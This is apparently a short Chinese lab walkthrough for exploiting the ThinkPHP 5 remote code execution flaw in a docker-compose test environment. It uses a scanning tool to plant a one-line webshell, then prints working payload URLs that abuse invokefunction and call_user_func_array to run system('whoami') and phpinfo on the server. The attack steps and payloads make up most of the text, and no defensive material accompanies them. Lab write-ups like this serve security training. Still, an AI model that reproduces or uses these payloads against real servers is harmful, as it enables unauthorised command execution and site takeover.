1.搭建环境
cd /www/wwwroot/thinkphp/5-rce/
docker-compose up -d
2.访问我们搭建的环境
3.复制网站url到蓝鲸去测试漏洞
发现了两个漏洞
其中一个得到了一些信息
另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问
4.访问成功,然后我们传参
执行成功!
5.在url中输入:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
可以执行我们的系统命令
6.输入;
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
可以执行我们的代码
